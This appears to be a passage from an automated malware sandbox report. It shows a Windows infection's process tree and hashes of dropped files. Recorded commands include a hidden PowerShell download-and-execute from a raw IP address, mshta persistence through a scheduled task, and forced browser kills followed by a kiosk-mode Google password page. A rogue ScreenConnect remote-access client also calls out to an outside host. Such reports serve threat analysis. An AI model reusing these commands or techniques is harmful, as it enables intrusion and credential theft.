                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1436 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:2
                                    6⤵
                                      PID:836
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2520 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:1504
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3492 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                      6⤵
                                        PID:3056
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3608 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                        6⤵
                                          PID:3156
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 556
                                      4⤵
                                      • Loads dropped DLL
                                      • Program crash
                                      PID:344
                                  • C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:596
                                  • C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:1696
                                    • C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2548
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 556
                                      4⤵
                                      • Program crash
                                      PID:2984
                                  • C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:1296
                                    • C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1628
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 500
                                      4⤵
                                      • Program crash
                                      PID:580
                                  • C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:816
                                  • C:\Users\Admin\AppData\Local\Temp\1089286001\aca90f55db.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089286001\aca90f55db.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1464
                                  • C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:2176
                                    • C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1572
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 500
                                      4⤵
                                      • Program crash
                                      PID:2032
                                  • C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:2744
                                  • C:\Users\Admin\AppData\Local\Temp\1089289001\5782e13f6e.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089289001\5782e13f6e.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:2004
                                  • C:\Users\Admin\AppData\Local\Temp\1089290001\2b8d02974d.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089290001\2b8d02974d.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Modifies system certificate store
                                    PID:1784
                                  • C:\Users\Admin\AppData\Local\Temp\1089291001\fd81d29568.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089291001\fd81d29568.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:3116
                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4140
                                  • C:\Users\Admin\AppData\Local\Temp\1089292001\3e0505c684.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089292001\3e0505c684.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3708
                                  • C:\Users\Admin\AppData\Local\Temp\1089293001\1b80ca21fe.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089293001\1b80ca21fe.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:2672
                                  • C:\Users\Admin\AppData\Local\Temp\1089294001\716ddbb44f.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089294001\716ddbb44f.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:2500
                                  • C:\Users\Admin\AppData\Local\Temp\1089295001\c139e4b71c.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089295001\c139e4b71c.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SendNotifyMessage
                                    PID:4068
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM firefox.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3244
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM chrome.exe /T
                                      4⤵
                                      • Kills process with taskkill
                                      PID:916
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM msedge.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:344
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM opera.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:308
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM brave.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3180
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                      4⤵
                                        PID:3160
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                          5⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of SendNotifyMessage
                                          PID:1872
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.0.974074840\1297266081" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {920f7147-3833-4628-a0a4-71d94b31f979} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 1304 115cf958 gpu
                                            6⤵
                                              PID:2188
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.1.1085012910\911290864" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62e49650-7555-4268-8034-4d78d6226e7f} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 1504 d74b58 socket
                                              6⤵
                                                PID:2180
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.2.866159266\495560448" -childID 1 -isForBrowser -prefsHandle 2204 -prefMapHandle 2200 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d663414d-787f-44c5-bbbf-f26f59be95b1} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 2216 19f04a58 tab
                                                6⤵
                                                  PID:3956
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.3.2109788058\1664269459" -childID 2 -isForBrowser -prefsHandle 2772 -prefMapHandle 2768 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ef77e4f-b096-4c68-96a6-f9377f9222a9} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 2784 d6f958 tab
                                                  6⤵
                                                    PID:3056
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.4.1639508946\1729018505" -childID 3 -isForBrowser -prefsHandle 3704 -prefMapHandle 3700 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {624a4419-d2ee-4b2c-9a2e-067b1d2153e9} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3716 1edcbf58 tab
                                                    6⤵
                                                      PID:3132
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.5.868853210\482986861" -childID 4 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82b3669e-63d7-4307-9e35-06c789620853} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3816 1f55cf58 tab
                                                      6⤵
                                                        PID:3680
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.6.436075440\561008601" -childID 5 -isForBrowser -prefsHandle 3996 -prefMapHandle 4000 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f964c14-16ff-4ff0-be88-c6973977807f} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3988 1f55a858 tab
                                                        6⤵
                                                          PID:3456
                                                  • C:\Users\Admin\AppData\Local\Temp\1089296001\cd7bf9405c.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1089296001\cd7bf9405c.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:3120
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c schtasks /create /tn 4rRGFmaI72f /tr "mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta" /sc minute /mo 25 /ru "Admin" /f
                                                      4⤵
                                                        PID:968
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn 4rRGFmaI72f /tr "mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta" /sc minute /mo 25 /ru "Admin" /f
                                                          5⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3440
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies Internet Explorer settings
                                                        PID:3416
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                          5⤵
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Downloads MZ/PE file
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3980
                                                          • C:\Users\Admin\AppData\Local\Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
                                                            "C:\Users\Admin\AppData\Local\Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:784
                                                    • C:\Users\Admin\AppData\Local\Temp\1089297001\d9b3cb7467.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1089297001\d9b3cb7467.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      PID:3912
                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4296
                                                    • C:\Users\Admin\AppData\Local\Temp\1089298001\ae7650820a.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1089298001\ae7650820a.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3436
                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                        4⤵
                                                          PID:4396
                                                  • C:\Windows\system32\msiexec.exe
                                                    C:\Windows\system32\msiexec.exe /V
                                                    1⤵
                                                    • Enumerates connected drives
                                                    • Boot or Logon Autostart Execution: Authentication Package
                                                    • Drops file in Program Files directory
                                                    • Drops file in Windows directory
                                                    • Modifies data under HKEY_USERS
                                                    • Modifies registry class
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1392
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 86FC0E5117DF6651A3DE8EA16C52C134 C
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1936
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID623.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259446432 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                        3⤵
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        PID:596
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 24DB031047C19720B6CE421BC212F8A8
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1084
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding F3A72156E91D9BDB4D0127C429D93822 M Global\MSI0000
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2252
                                                  • C:\Windows\system32\vssvc.exe
                                                    C:\Windows\system32\vssvc.exe
                                                    1⤵
                                                      PID:1092
                                                    • C:\Windows\system32\DrvInst.exe
                                                      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D0" "00000000000005E4"
                                                      1⤵
                                                      • Drops file in Windows directory
                                                      • Modifies data under HKEY_USERS
                                                      PID:1724
                                                    • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe
                                                      "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=4c1c2002-a97f-4c37-803c-c5cb50aec162&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="
                                                      1⤵
                                                      • Sets service image path in registry
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in System32 directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1228
                                                      • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
                                                        "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "a4577e1f-49e7-4e62-bd1c-af5de57da05b" "User"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2432
                                                      • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
                                                        "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "0d0781cb-4444-4bcb-973b-9e5e2bd28140" "System"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        • Modifies data under HKEY_USERS
                                                        PID:1724
                                                    • C:\Windows\system32\taskeng.exe
                                                      taskeng.exe {58647526-2BB0-4FBC-ADA9-B981778F2958} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
                                                      1⤵
                                                        PID:1656
                                                        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1296
                                                        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3776
                                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                        1⤵
                                                          PID:3232
                                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                          1⤵
                                                            PID:3472

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Config.Msi\f76fe4e.rbs

                                                            Filesize

                                                            213KB

                                                            MD5

                                                            f309b8fb435d54c539db2f2040e43694

                                                            SHA1

                                                            c65d278e4c39a6b51ee2919a0691c543de850ad3

                                                            SHA256

                                                            643cada06d43dbced2093533caf77138a5f91b277d8bf3abe15f423aa5784b28

                                                            SHA512

                                                            d93d1e3188a3c64bf5fee0e7483ea8e4dfcd9f909b15628071b57b8ba0a79d41251f300453e27072f49dc03e096ba00fab16f7e48ed8efb3c179771960fad8b2

                                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll

                                                            Filesize

                                                            66KB

                                                            MD5

                                                            5db908c12d6e768081bced0e165e36f8

                                                            SHA1

                                                            f2d3160f15cfd0989091249a61132a369e44dea4

                                                            SHA256

                                                            fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca

                                                            SHA512

                                                            8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d

                                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe

                                                            Filesize

                                                            93KB

                                                            MD5

                                                            75b21d04c69128a7230a0998086b61aa

                                                            SHA1

                                                            244bd68a722cfe41d1f515f5e40c3742be2b3d1d

                                                            SHA256

                                                            f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e

                                                            SHA512

                                                            8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2

                                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll

                                                            Filesize

                                                            254KB

                                                            MD5

                                                            5adcb5ae1a1690be69fd22bdf3c2db60

                                                            SHA1

                                                            09a802b06a4387b0f13bf2cda84f53ca5bdc3785

                                                            SHA256

                                                            a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

                                                            SHA512

                                                            812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

                                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll

                                                            Filesize

                                                            822KB

                                                            MD5

                                                            be74ab7a848a2450a06de33d3026f59e

                                                            SHA1

                                                            21568dcb44df019f9faf049d6676a829323c601e

                                                            SHA256

                                                            7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

                                                            SHA512

                                                            2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

                                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\app.config

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            c0d2cd7ac50f669700a1c10033b3587f

                                                            SHA1

                                                            ad9dcbcef8c13357ce23be47663b97e8dd713893

                                                            SHA256

                                                            f4a2f6e0647e8c0dcb43982cc437ebe61c2350ca70c5fb6fc0d27d7381477b62

                                                            SHA512

                                                            4fe71bd6929a78702cdcc4a942e1dd7970766831150313d0e145566496ed09c12e036dc492cb8a835bec87911d94394d9d3b677056e91837af4954870577ca1e

                                                          • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\system.config

                                                            Filesize

                                                            944B

                                                            MD5

                                                            dc4ecf929dfeed665ea45461ca624547

                                                            SHA1

                                                            82913405d7c1902e156c4e5d61dfb1b5fb54a2e0

                                                            SHA256

                                                            482b0ed7d65d1776f42a0782dcc072d14f9846599544f5c79383c9c41658dd18

                                                            SHA512

                                                            d21298e443f34866ac9878c23571e7577855a73581d430cccef333076ddac4fd9574dd16fa2e9a8a4e8e44c2c9ea4e89218dcd794cafc10afd45e7a6c41a1547

                                                          • C:\Temp\oIlpHh5KE.hta

                                                            Filesize

                                                            782B

                                                            MD5

                                                            16d76e35baeb05bc069a12dce9da83f9

                                                            SHA1

                                                            f419fd74265369666595c7ce7823ef75b40b2768

                                                            SHA256

                                                            456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

                                                            SHA512

                                                            4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            40B

                                                            MD5

                                                            ba9989410d716a22402772f7579c497b

                                                            SHA1

                                                            e382fd8a875080e0bc8d207a7714f1bb80e49166

                                                            SHA256

                                                            44b5004d498de3043d1f4775bdbeecf54135c83125021a3e68fcded07299936b

                                                            SHA512

                                                            bc9b14c99089e450cae307b7439b4624265925eeee20a89bf6dc13a9e6f4a54ab242d095d0549cbffa3cd88ea622eb1ea9d6ad9154a3b75a09448aabae4c1c5b

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000009.dbtmp

                                                            Filesize

                                                            16B

                                                            MD5

                                                            979c29c2917bed63ccf520ece1d18cda

                                                            SHA1

                                                            65cd81cdce0be04c74222b54d0881d3fdfe4736c

                                                            SHA256

                                                            b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53

                                                            SHA512

                                                            e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                            Filesize

                                                            264KB

                                                            MD5

